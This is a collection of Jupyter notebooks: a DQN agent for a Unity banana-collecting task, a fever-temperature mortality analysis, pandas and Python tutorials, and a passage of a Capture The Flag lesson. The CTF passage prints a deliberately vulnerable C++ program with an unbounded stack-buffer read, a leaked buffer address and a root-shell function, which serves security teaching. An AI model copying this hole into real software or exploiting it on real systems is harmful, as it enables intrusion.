e708a709773760162dca56d019c73d0e486babde | 47,488 | ipynb | Jupyter Notebook | script_1.ipynb | BruceChanJianLe/drlnd-banana-navigation-project1 | c30c393f945a84860f7b503b5fe33972bf2f6ad7 | [
"MIT"
] | null | null | null | script_1.ipynb | BruceChanJianLe/drlnd-banana-navigation-project1 | c30c393f945a84860f7b503b5fe33972bf2f6ad7 | [
"MIT"
] | null | null | null | script_1.ipynb | BruceChanJianLe/drlnd-banana-navigation-project1 | c30c393f945a84860f7b503b5fe33972bf2f6ad7 | [
"MIT"
] | null | null | null | 105.2949 | 25,512 | 0.809762 | [
[
[
"# Banana Navigation\n\n## Import Packages",
"_____no_output_____"
]
],
[
[
"# If you are runnning on Udacity's VM please run their script\nvm_var = True\n!pip -q install ./python",
"\u001b[31mtensorflow 1.7.1 has requirement numpy>=1.13.3, but you'll have numpy 1.12.1 which is incompatible.\u001b[0m\r\n\u001b[31mipython 6.5.0 has requirement prompt-toolkit<2.0.0,>=1.0.15, but you'll have prompt-toolkit 3.0.7 which is incompatible.\u001b[0m\r\n"
],
[
"from unityagents import UnityEnvironment\nimport numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom collections import deque, namedtuple\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"## Initialize Unity Environment",
"_____no_output_____"
]
],
[
[
"if vm_var:\n env = UnityEnvironment(file_name=\"/data/Banana_Linux_NoVis/Banana.x86_64\")\n# else:\n# env = UnityEnvironment(filename=\"data/Banana_Linux_NoVis/Banana.x86_64\")\n\n# Obtain the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# Reset the environment\nenv_info = env.reset(train_mode=True)[brain_name]\n# Display number of agents in the environment\nprint('Number of agents:', len(env_info.agents))\n\n# Obtain and display action size \naction_size = brain.vector_action_space_size\nprint('Number of actions:', action_size)\n\n# Obtain and display state space\nstate = env_info.vector_observations[0]\nprint('The states look like:', state)\n\n# Obtain and display state size\nstate_size = len(state)\nprint('The states size:', state_size)",
"INFO:unityagents:\n'Academy' started successfully!\nUnity Academy name: Academy\n Number of Brains: 1\n Number of External Brains : 1\n Lesson number : 0\n Reset Parameters :\n\t\t\nUnity brain name: BananaBrain\n Number of Visual Observations (per agent): 0\n Vector Observation space type: continuous\n Vector Observation space size (per agent): 37\n Number of stacked Vector Observation: 1\n Vector Action space type: discrete\n Vector Action space size (per agent): 4\n Vector Action descriptions: , , , \n"
]
],
[
[
"## Define Deep Learning Model\n\n2 fully connected hidden layers with 64 neurons and ReLu as activation function",
"_____no_output_____"
]
],
[
[
"def Qmodel(state_size, action_size, seed):\n model = nn.Sequential(nn.Linear(state_size, 64),\n nn.ReLU(),\n nn.Linear(64, 64),\n nn.ReLU(),\n nn.Linear(64,action_size))\n return model",
"_____no_output_____"
]
],
[
[
"## Define Replay Buffer\n\nReplay buffer with random sampling",
"_____no_output_____"
]
],
[
[
"class ReplayBuffer:\n \"\"\"Fixed-size buffer to store experience tuples.\"\"\"\n\n def __init__(self, action_size, buffer_size, batch_size, seed):\n \"\"\"Initialize a ReplayBuffer object.\n\n Params\n ======\n action_size (int): dimension of each action\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n seed (int): random seed\n \"\"\"\n self.action_size = action_size\n self.memory = deque(maxlen=buffer_size) \n self.batch_size = batch_size\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(seed)\n \n def add(self, state, action, reward, next_state, done):\n \"\"\"Add a new experience to memory.\"\"\"\n e = self.experience(state, action, reward, next_state, done)\n self.memory.append(e)\n \n def sample(self):\n \"\"\"Randomly sample a batch of experiences from memory.\"\"\"\n experiences = random.sample(self.memory, k=self.batch_size)\n\n states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)\n actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device)\n rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)\n next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)\n dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device)\n \n return (states, actions, rewards, next_states, dones)\n\n def __len__(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory)",
"_____no_output_____"
]
],
[
[
"## Define Agent",
"_____no_output_____"
]
],
[
[
"BUFFER_SIZE = int(1e5) # replay buffer size\nBATCH_SIZE = 64 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 5e-3 # for soft update of target parameters\nLR = 1e-3 # learning rate \nUPDATE_EVERY = 4 # how often to update the network\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\nclass Agent():\n def __init__(self,state_size, action_size, seed):\n self.state_size = state_size\n self.action_size = action_size\n self.seed = random.seed(seed)\n self.q_local = Qmodel(state_size,action_size, seed).to(device)\n self.q_target = Qmodel(state_size,action_size, seed).to(device)\n self.optimizer = optim.Adam(self.q_local.parameters(), lr=LR)\n \n self.buffer = ReplayBuffer(action_size, BUFFER_SIZE, BATCH_SIZE, seed)\n self.t_step = 0\n return\n \n def step(self, state, action, reward, next_state, done):\n self.buffer.add(state, action, reward, next_state, done)\n \n self.t_step = (self.t_step +1) % UPDATE_EVERY \n if self.t_step == 0:\n if len(self.buffer)>BATCH_SIZE:\n self.learn()\n return\n \n def act(self,state, eps = 0.0):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.q_local.eval()\n with torch.no_grad():\n action = self.q_local(state)\n self.q_local.train()\n if random.random() > eps:\n action = np.argmax(action.cpu().data.numpy())\n else:\n action = np.random.choice(np.arange(self.action_size))\n return action\n \n def learn(self):\n states, actions, rewards, next_states, dones = self.buffer.sample()\n q_targets_next = self.q_target(next_states).detach().max(1)[0].unsqueeze(1)\n q_targets = rewards + (GAMMA * q_targets_next * (1 - dones))\n q_pred = self.q_local(states).gather(1,actions)\n loss = F.mse_loss(q_pred,q_targets)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.soft_update()\n return\n \n def soft_update(self):\n for target_p, local_p in zip(self.q_target.parameters(), self.q_local.parameters()):\n target_p.data.copy_(TAU * local_p.data + (1 - TAU)*target_p.data)\n return",
"_____no_output_____"
]
],
[
[
"## Define Training Function",
"_____no_output_____"
]
],
[
[
"def dqn(n_episodes=3000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n scores = []\n scores_recent = []\n eps = eps_start\n for i_episode in range(1, n_episodes+1):\n env_info = env.reset(train_mode=True)[brain_name]\n state = env_info.vector_observations[0] # get the initial state\n score = 0\n for i_t in range(max_t): # considered as episodic with 100 steps\n action = agent.act(state, eps) # select an action\n env_info = env.step(action)[brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n agent.step(state, action, reward, next_state, done) # Sample & Learn step of Q learning\n score += reward # update the score\n state = next_state # roll over the state to next time step\n if done: # exit loop if episode finished\n break\n scores.append(score)\n scores_recent.append(score)\n eps = max(eps_end, eps*eps_decay) # decrease epsilon\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_recent)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_recent)))\n if np.mean(scores_recent)>=13.0:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_recent)))\n torch.save(agent.q_local.state_dict(), 'my_weights.pth')\n break\n return scores",
"_____no_output_____"
]
],
[
[
"## Run The Code!!!",
"_____no_output_____"
]
],
[
[
"# Provide parameters to agent\nagent = Agent(state_size, action_size, seed=0)\n# Obtain scores\nscore = dqn(2000, eps_decay=0.930)",
"Episode 100\tAverage Score: 6.63\nEpisode 200\tAverage Score: 8.17\nEpisode 300\tAverage Score: 9.42\nEpisode 400\tAverage Score: 10.28\nEpisode 500\tAverage Score: 11.03\nEpisode 600\tAverage Score: 11.51\nEpisode 700\tAverage Score: 11.92\nEpisode 800\tAverage Score: 12.20\nEpisode 900\tAverage Score: 12.42\nEpisode 1000\tAverage Score: 12.53\nEpisode 1100\tAverage Score: 12.55\nEpisode 1200\tAverage Score: 12.71\nEpisode 1300\tAverage Score: 12.83\nEpisode 1400\tAverage Score: 12.91\nEpisode 1500\tAverage Score: 12.98\nEpisode 1533\tAverage Score: 13.00\nEnvironment solved in 1433 episodes!\tAverage Score: 13.00\n"
],
[
"fig = plt.figure()\nax = fig.add_subplot(111)\nplt.plot(np.arange(len(score)), score)\nplt.ylabel('Score')\nplt.xlabel('Episode #')\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e708c4a90841df77cc2af963a64ac28ffb8e6293 | 54,505 | ipynb | Jupyter Notebook | models/.ipynb_checkpoints/CFR & Temp-checkpoint.ipynb | afcarl/ebola-imc-public | 94f8621ed6930447dd81898f1a1ff44862c17108 | [
"MIT"
] | null | null | null | models/.ipynb_checkpoints/CFR & Temp-checkpoint.ipynb | afcarl/ebola-imc-public | 94f8621ed6930447dd81898f1a1ff44862c17108 | [
"MIT"
] | null | null | null | models/.ipynb_checkpoints/CFR & Temp-checkpoint.ipynb | afcarl/ebola-imc-public | 94f8621ed6930447dd81898f1a1ff44862c17108 | [
"MIT"
] | 2 | 2020-05-07T14:38:49.000Z | 2020-05-07T19:00:19.000Z | 251.175115 | 12,806 | 0.91076 | [
[
[
"This notebook plots the graph of temperature as function of age",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats",
"/Users/andres/anaconda/lib/python2.7/site-packages/matplotlib/__init__.py:872: UserWarning: axes.color_cycle is deprecated and replaced with axes.prop_cycle; please use the latter.\n warnings.warn(self.msg_depr % (key, alt_key))\n"
],
[
"# This generates the \"eikosogram\" of mortality as function of fever temperature, each bar in the plot\n# represents the conditional probability of death given that temperature is in that bin\n\nsrc_data_file = '../data/data.csv'\ndata = pd.read_csv(src_data_file, na_values='\\\\N')\n\nnum_bins = 5\nvar = 'FeverTemperature'\n\nmint = data[var].min()\nmaxt = data[var].max()\n\nbins = np.linspace(mint, maxt, num=num_bins)\nbins_names = []\nfor i in range(0, len(bins) - 1):\n bins_names += [str(round(bins[i],1)) + \"-\" + str(round(bins[i + 1],1))]\n\ndata1 = data.copy()\n\ndata1['bin'] = pd.cut(data1[var], bins, labels=False)\ndata1 = data1.dropna(subset=['bin'])\ndied_temp = data1[data1['Disposition'] == 1].groupby(['bin']).count()['Disposition']\ntotals_temp = data1.groupby(['bin']).count()['Disposition']\n\nfig, ax = plt.subplots()\n\nbar_width = 0.35\nopacity = 0.8\ncfr_pdw = 100 * died_temp / totals_temp\nindex = np.arange(len(bins) - 1)\nrects2 = plt.bar(index, cfr_pdw, bar_width,\n alpha=opacity,\n color=sns.xkcd_rgb[\"pale red\"],\n label='CFR')\n\nplt.xlabel('Fever Temperature', labelpad=20)\nplt.ylabel('CFR %')\nplt.title('CFR as function of Fever Temperature')\nplt.xticks(index + bar_width/2, bins_names, rotation=0)\n\nfig.savefig('cfr_temp.pdf')",
"_____no_output_____"
],
[
"# Looking at differences in fever temperature between males and females, \n# depending on\n# 0 = Female\n# 1 = Male\n\ndata = pd.read_csv(src_data_file, na_values=\"\\\\N\")\ndata_male_died = data[(data[\"PatientSex\"] == 1) & (data[\"Disposition\"] == 1)]\ndata_male_surv = data[(data[\"PatientSex\"] == 1) & (data[\"Disposition\"] == 0)]\ndata_male_died.hist(column=\"FeverTemperature\")\ndata_male_surv.hist(column=\"FeverTemperature\")\n\ndata_fem_died = data[(data[\"PatientSex\"] == 0) & (data[\"Disposition\"] == 1)]\ndata_fem_surv = data[(data[\"PatientSex\"] == 0) & (data[\"Disposition\"] == 0)]\ndata_fem_died.hist(column=\"FeverTemperature\")\ndata_fem_surv.hist(column=\"FeverTemperature\")\nprint \"Male died: \", data_male_died[\"FeverTemperature\"].mean()\nprint \"Male surv: \",data_male_surv[\"FeverTemperature\"].mean()\n(s, p) = stats.ttest_ind(data_male_died[\"FeverTemperature\"],data_male_surv[\"FeverTemperature\"],nan_policy='omit')\nprint \"P-value of the difference between means for males: \", p\n\nprint \"Female died: \",data_fem_died[\"FeverTemperature\"].mean()\nprint \"Female surv: \",data_fem_surv[\"FeverTemperature\"].mean()\n(s, p) = stats.ttest_ind(data_fem_died[\"FeverTemperature\"],data_fem_surv[\"FeverTemperature\"],nan_policy='omit')\nprint \"P-value of the difference between means for females: \", p",
"Male died: 37.8139534884\nMale surv: 37.328125\nP-value of the difference between means for males: 0.0451559815757\nFemale died: 37.5987341772\nFemale surv: 37.4645833333\nP-value of the difference between means for females: 0.529417282298\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e708c68422e4d273e3ca2a7b6c6f54fcba7b6d45 | 35,984 | ipynb | Jupyter Notebook | notebooks/intro_to_pandas.ipynb | wkabbani/machine_learning | cc9393365005ca9c1b516309d290987b53a7e75a | [
"Apache-2.0"
] | null | null | null | notebooks/intro_to_pandas.ipynb | wkabbani/machine_learning | cc9393365005ca9c1b516309d290987b53a7e75a | [
"Apache-2.0"
] | null | null | null | notebooks/intro_to_pandas.ipynb | wkabbani/machine_learning | cc9393365005ca9c1b516309d290987b53a7e75a | [
"Apache-2.0"
] | null | null | null | 40.613995 | 8,900 | 0.484076 | [
[
[
"##Basic Concepts",
"_____no_output_____"
]
],
[
[
"from __future__ import print_function\n\nimport pandas as pd\npd.__version__",
"_____no_output_____"
],
[
"# Series is a single column\ntest_series = pd.Series(['one', 'two', 'three'])",
"_____no_output_____"
],
[
"print(test_series)",
"0 one\n1 two\n2 three\ndtype: object\n"
],
[
"# DataFrame contains one or more Series and a name for each Series.\n\nmonths_series = pd.Series(['Jan', 'Feb', 'Mar', 'Apr'])\nsales_series = pd.Series([345, 675, 7655, 65449])\n\ntest_dataframe = pd.DataFrame({'Months': months_series, 'Sales': sales_series })",
"_____no_output_____"
],
[
"test_dataframe.head()",
"_____no_output_____"
],
[
"# loading a file\n\ncalifornia_housing_dataframe = pd.read_csv(\"https://download.mlcc.google.com/mledu-datasets/california_housing_train.csv\", sep=\",\")\ncalifornia_housing_dataframe.describe()",
"_____no_output_____"
],
[
"california_housing_dataframe.head(10)",
"_____no_output_____"
],
[
"california_housing_dataframe.hist('housing_median_age')",
"_____no_output_____"
]
],
[
[
"##Accessing Data",
"_____no_output_____"
]
],
[
[
"print(test_dataframe['Months'][0])",
"Jan\n"
],
[
"print(test_dataframe['Sales'][0:2])",
"0 345\n1 675\nName: Sales, dtype: int64\n"
],
[
"print(test_dataframe[0:2])",
" Months Sales\n0 Jan 345\n1 Feb 675\n"
]
],
[
[
"##Manipulating Data",
"_____no_output_____"
]
],
[
[
"print(test_dataframe['Sales'])",
"0 345\n1 675\n2 7655\n3 65449\nName: Sales, dtype: int64\n"
],
[
"print(test_dataframe['Sales']/1000)",
"0 0.345\n1 0.675\n2 7.655\n3 65.449\nName: Sales, dtype: float64\n"
],
[
"# pandas series can be used with numpy's functions\n\nimport numpy as np\nnp.log(test_dataframe['Sales'])",
"_____no_output_____"
],
[
"test_series.apply(lambda val: val * 3)",
"_____no_output_____"
],
[
"print(test_dataframe.index)\nprint(test_series.index)",
"RangeIndex(start=0, stop=4, step=1)\nRangeIndex(start=0, stop=3, step=1)\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e708c7d0fb4963cbe2d6101817450ad4ee97a799 | 12,998 | ipynb | Jupyter Notebook | content/07_collections04.ipynb | geozeke/notebooks | 25a708e86d2d51979bf77c268b2b7ed91d33c954 | [
"MIT"
] | null | null | null | content/07_collections04.ipynb | geozeke/notebooks | 25a708e86d2d51979bf77c268b2b7ed91d33c954 | [
"MIT"
] | 8 | 2020-08-31T18:20:30.000Z | 2022-01-29T22:48:39.000Z | content/07_collections04.ipynb | geozeke/notebooks | 25a708e86d2d51979bf77c268b2b7ed91d33c954 | [
"MIT"
] | null | null | null | 45.929329 | 563 | 0.629943 | [
[
[
"# Pass by Value; Pass by Reference\n\nThis is an important topic in the study of computing. It's tricky to understand at first, but you'll get it with practice. Once you understand this topic (and you will) your programming skills will really take off.\n\nIn an Object Oriented Programming (OOP) language like Python, an Object contains both the data itself and a set of methods (like functions) that can operate on that data. When an Object is created it is assigned a unique Object id, often referred-to as its memory address or ***Pointer***. An immutable Object can't be changed once it's created; and a mutable Object can be changed once it's created. Here's a list of mutable and immutable data types that we've seen so far:\n\n#### Immutable Data Types\n\n* String\n* Int\n* Bool\n* Float\n* Tuple\n\n#### Mutable Data Types\n\n* List\n* Dictionary\n* Set\n\nThe concept of mutability can be difficult to understand. We've discussed it in previous notebooks, but consider the code below:",
"_____no_output_____"
]
],
[
[
"s = \"Go Navy\"\nprint(s)\ns = \"Beat Army\"\nprint(s)\n",
"_____no_output_____"
]
],
[
[
"Doesn't that make `s` mutable? Saying a variable is immutable means that it can't be changed, but it sure looks like `s` is changing. What's going on?\n\nIn the code above, we're not changing (mutating) `s`, we're actually throwing away the old Object associated with `s` and creating an entirely new Object for `s`. To illustrate this, remember: ***When an Object is created it is assigned a unique Object id.*** Python provides a built-in function to display an Object's id and we can use it to see how `s` is assigned a new string Object as the code runs:",
"_____no_output_____"
]
],
[
[
"s = \"Go Navy\" # Create a new string Object\nprint(s)\nprint(id(s))\ns = \"Beat Army\" # Create a different string Object (throwing the old one away)\nprint(s)\nprint(id(s))\n",
"_____no_output_____"
]
],
[
[
"Run the code above and observe how `s` gets a new Object id when it goes from `Go Navy` to `Beat Army`. The variable `s` is immutable, but we can discard its Object and create a new one. That's different from changing an immutable variable. To see this, examine the code below. Since the variable `s` is immutable, the code will crash:",
"_____no_output_____"
]
],
[
[
"s = \"Go Navy\"\nprint(\"The first letter is\", s[0])\ns[0] = 'B'\nprint(\"The first letter is\", s[0])\n",
"_____no_output_____"
]
],
[
[
"We can *access* individual letters in a string (line 2), but the code crashes at line 3 because we cannot *change* (mutate) individual letters in a string.",
"_____no_output_____"
],
[
"### Passing Variables to Functions\n\nUnderstanding how Python handles Objects is key to understanding the difference between ***Pass by Value*** and ***Pass by Reference***. A simple set of rules emerges:\n\n* If you pass an immutable variable to a function as an argument, any changes the function makes to the associated parameter <ins>**will not**</ins> affect the value of the original argument. We call this ***Pass by Value***.\n* If you pass a mutable variable to a function, any changes the function makes to the associated parameter <ins>**will**</ins> affect the value of the original argument. We call this ***Pass by Reference***.\n\nProgramming with those simple rules in mind is enough, and you'll get it right if you understand them. It's okay if you just memorize them for now, but you're more advanced than that. You're becoming a skilled programmer and the sky is the limit. It's been long journey, and the journey will continue throughout your entire life, but as you embark on the next phase you're now ready to hear the unvarnished truth: [***All Python Variables are Actually Pointers to Objects***](https://medium.com/@abdullah.tech/python-variables-are-pointers-c8b85880f21e).\n\nLet's start with a simple function that takes an integer and returns double that value:",
"_____no_output_____"
]
],
[
[
"def doubleIt(base):\n return 2 * base\n\n\nn = int(input(\"Enter an integer: \"))\nprint(f\"2 x {n:,d} = {doubleIt(n):,d}\")\n",
"_____no_output_____"
]
],
[
[
"Run the code above and explore how it works. You should be comfortable with the use of *f-strings*.\n\n<hr>\n\nNow let's use Python's [id()](https://docs.python.org/3/library/functions.html) function to examine the unique id numbers of the variables being used:",
"_____no_output_____"
]
],
[
[
"def doubleIt(x):\n print(f\"Inside function: x = {x:,d}; id(x) = {id(x):d}\")\n return 2 * x\n\n\nn = int(input(\"Enter an integer: \"))\nprint(f\"Outside function before call: n = {n:,d}; id(n) = {id(n):d}\")\nprint(f\"2 x {n:,d} = {doubleIt(n):,d}\")\nprint(f\"Outside function after call: n = {n:,d}; id(n) = {id(n):d}\")\n",
"_____no_output_____"
]
],
[
[
"The id of `x` (the function parameter) should be the same as the id of `n` (the argument in the function call). That's because Python is passing `n` as a Pointer for use in the function `doubleIt()`. Now let's examine what happens if we change the value of the `x` parameter inside the function:",
"_____no_output_____"
]
],
[
[
"def doubleIt(x):\n print(f\"Inside function before mod: x = {x:,d}; id(x) = {id(x):d}\")\n x *= 2\n print(f\"Inside function after mod: x = {x:,d}; id(x) = {id(x):d}\")\n return x\n\n\nn = int(input(\"Enter an integer: \"))\nprint(f\"Outside function before call: n = {n:,d}; id(n) = {id(n):d}\")\nprint(f\"2 x {n:,d} = {doubleIt(n):,d}\")\nprint(f\"Outside function after call: n = {n:,d}; id(n) = {id(n):d}\")\n",
"_____no_output_____"
]
],
[
[
"Run the code. Notice that the parameter `x` starts with the same id as the argument `n`. It then gets a new id inside the function, however the id of `n` never changes. Since the argument `n` is an immutable type (integer) any changes to `x` are local in scope to `doubleIt()` and have no impact on the value of `n`. We we would call this situation ***Pass by Value***.\n\n### Passing by Reference\n\nSo, if you pass an immutable variable to a function as an argument, any changes the function makes to the associated parameter <ins>**will not**</ins> affect the value of the original argument. We call this ***Pass by Value***. Now let's take a look at how it works using a mutable variable type. We'll tweak the code to take a Python list and double the second item in the list:",
"_____no_output_____"
]
],
[
[
"def modifySecond(aList):\n print(\n f\"Inside function before mod: aList = {str(aList):s}; id(aList) = {id(aList):d}\")\n aList[1] = 100\n print(\n f\"Inside function after mod: aList = {str(aList):s}; id(aList) = {id(aList):d}\")\n return\n\n\nL = [2, 4, 6]\nprint(f\"Outside function before call: L = {str(L):s}; id(L) = {id(L):d}\")\nmodifySecond(L)\nprint(f\"Outside function after call: L = {str(L):s}; id(L) = {id(L):d}\")\n",
"_____no_output_____"
]
],
[
[
"Lots going on here:\n\n* I'm making use of Python's [str()](https://docs.python.org/3/library/stdtypes.html#str) function which takes a variable and provides a string representation of it. Very handy when using *f-strings* with lists.\n* Notice that I use a single `return` at the end of my function, with nothing after it. Using return all by itself means I'm actually returning a special pointer called [None](https://docs.python.org/3/library/constants.html#None). You could leave the `return` statement off all together and it would still work, but it enhances your code's clarity to delineate the end of your function with a solitary `return` statement.\n* The id of our list never changes. It's the same outside the function as well as inside.\n* Since Python lists are mutable, any changes we make to the parameter `aList` (inside the function) ***will*** impact the argument `L` (outside the function).\n\nThat's ***Passing by Reference***. If you pass a mutable variable to a function as an argument, any changes the function makes to the associated parameter <ins>**will**</ins> affect the value of the original argument. We call this ***Pass by Reference***.\n\nIf all this makes your head hurt, just take a deep breath. Learning and truly internalizing this topic can take a long time, but with practice you'll get it. Python is interesting, because all variables are actually holding Pointers to Objects, but the concepts of ***Pass by Value*** and ***Pass by Reference*** still help us control the behavior of our code. For now, just remember:\n\n* Changes to immutable variables passed to functions ***don't*** have an impact outside the function (***Pass by Value***).\n* Changes to mutable variables passed to functions ***do*** have an impact outside the function (***Pass by Reference***).",
"_____no_output_____"
],
[
"## Additional Resources\n\n[Parameter Passing in Python](https://www.python-course.eu/passing_arguments.php)\n\n[All Python Variables are Actually Pointers to Objects](https://medium.com/@abdullah.tech/python-variables-are-pointers-c8b85880f21e)\n\n[What is the None keyword in Python?](https://www.educative.io/edpresso/what-is-the-none-keyword-in-python)\n\n[Tricky Python II: Parameter Passing for Mutable & Immutable Objects](https://medium.com/@tyastropheus/tricky-python-ii-parameter-passing-for-mutable-immutable-objects-10e968cbda35)",
"_____no_output_____"
],
[
"<hr>\n\n*MIT License*\n\n*Copyright 2019-2022 Peter Nardi*\n\n*Terms of use:*\n\n*Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:*\n\n*The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.*\n\n*THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e708d91c178bc6a4a827c43eb77286fb16f54b38 | 25,591 | ipynb | Jupyter Notebook | CTF.ipynb | rambasnet/Hacking-CPP-Notebooks | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | 1 | 2022-01-19T16:40:29.000Z | 2022-01-19T16:40:29.000Z | CTF.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | null | null | null | CTF.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | null | null | null | 34.960383 | 704 | 0.541284 | [
[
[
"# Capture The Flag (CTF)\n\n- How the Best Hackers Learn Their Craft: [Watch YouTube](https://www.youtube.com/watch?v=6vj96QetfTg&t=214s&ab_channel=RSAConference)\n\n## online CTF\n- Learn CTF - https://ctflearn.com/\n- PicoCTF - https://picoctf.org/\n\n## pwntools and CTF\n- pwntools is designed for quick exploitation in CTF environments\n- most CTF environments use client-server architecture\n - flag is on the server\n - you interact to the server from a remote client\n - exploit the server program and capture the flag (CTF)\n \n- you can easily create a server using netcat (nc) program in listening mode\n- you can also execute a binary/program when client connects to it\n- let's look into the `ctf-demos/basic` folder that tries to simulate the CTF-like environment\n- we'll use the `ctf-demos/basic/vuln.cpp` program to demonstrate how **pwntools** framework can be used to create exploit code using Python\n- a good YouTube video on Pwn Template and Input / Output is found here: https://www.youtube.com/watch?v=NhNbivMVPk0&ab_channel=ChristopherSchafer](https://www.youtube.com/watch?v=NhNbivMVPk0&ab_channel=ChristopherSchafer)\n\n## Netcat (nc)\n- https://en.wikipedia.org/wiki/Netcat\n- https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf\n- `nc` - networking utility for reading from and writing to network connections using TCP or UDP\n- can be very useful to transfer file between computers with limited resources",
"_____no_output_____"
]
],
[
[
"! ls -al ./ctf-demos/basic",
"total 76\ndrwxr-xr-x 2 kali kali 4096 Apr 12 23:41 .\ndrwxr-xr-x 5 kali kali 4096 Jan 15 14:09 ..\n-rw-r--r-- 1 kali kali 2318 Jan 15 14:09 exploit_demo.py\n-rw-r--r-- 1 kali kali 1334 Jan 15 14:09 exploit_getoffset.py\n-rwxr-xr-x 1 kali kali 1898 Jan 15 14:09 exploit.py\n-rw-r--r-- 1 kali kali 2576 Jan 15 14:09 exploit_vuln.py\n-rw-r--r-- 1 kali kali 17 Jan 15 14:09 flag.txt\n-rw-r--r-- 1 kali kali 1054 Feb 10 21:12 Makefile\n-rw-r--r-- 1 kali kali 116 Jan 15 14:09 netcat-loop.sh\n-rw-r--r-- 1 kali kali 1321 Jan 15 14:09 vuln.cpp\n-rwxr-xr-x 1 root root 33668 Apr 12 23:41 vuln.exe\n"
],
[
"! cat ./ctf-demos/basic/vuln.cpp",
"#include <stdio.h>\n#include <string.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <iostream>\nusing namespace std;\n\n#define BUFSIZE 128\n\nusing namespace std;\n\nvoid give_shell(){\n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n system(\"/bin/sh\");\n}\n\nchar * mgets(char *dst) {\n char *ptr = dst;\n int ch; \n\t/* skip leading white spaces */ \n while ((ch = getchar()) && (ch == ' ' or ch == '\\t') )\n ; \n\n if ((ch == '\\n') or (ch == EOF)) { \n *ptr = '\\0';\n return dst; \n } \n else\n *ptr = ch;\n\n /* now read the rest until \\n or EOF */ \n while (true) {\n ch = getchar();\n if (ch == '\\n' or ch == EOF) break;\n *(++ptr) = ch; \n }\n *(++ptr) = 0;\n return dst;\n}\n\nvoid bad() {\n char buffer[BUFSIZE];\n printf(\"buffer is at %p\\n\", buffer);\n cout << \"Give me some text: \";\n fflush(stdout);\n mgets(buffer); // similar to C's gets;\n //gets(buffer); // depricated in C++\n cout << \"Acknowledged: \" << buffer << \" with length \" << strlen(buffer) << endl;\n}\n\nint main(int argc, char *argv[]) {\n gid_t 